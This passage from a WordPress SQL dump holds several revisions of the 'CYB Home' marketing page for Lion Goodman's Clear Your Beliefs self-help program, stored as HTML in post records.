fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:30:00', '2014-10-08 05:30:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1501, 2, '2014-10-08 00:38:14', '2014-10-08 05:38:14', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\n<p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:38:14', '2014-10-08 05:38:14', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1500, 2, '2014-10-08 00:37:15', '2014-10-08 05:37:15', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><p>style="margin-left: 41px;"&gt;<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] </p><p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center"><strong>DOWNLOAD THE iClearIt APP</strong></p><p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:37:15', '2014-10-08 05:37:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1502, 2, '2014-10-08 00:39:40', '2014-10-08 05:39:40', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong></p>\n<p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n<p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:39:40', '2014-10-08 05:39:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1503, 2, '2014-10-08 00:51:32', '2014-10-08 05:51:32', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n<p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:51:32', '2014-10-08 05:51:32', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1504, 2, '2014-10-08 00:59:01', '2014-10-08 05:59:01', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n<p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>Copyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:59:01', '2014-10-08 05:59:01', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1505, 2, '2014-10-08 01:40:29', '2014-10-08 06:40:29', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n<p>Step 3</p><p style="text-align: center"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>Copyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 01:40:29', '2014-10-08 06:40:29', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1506, 2, '2014-10-08 01:42:42', '2014-10-08 06:42:42', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n<p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 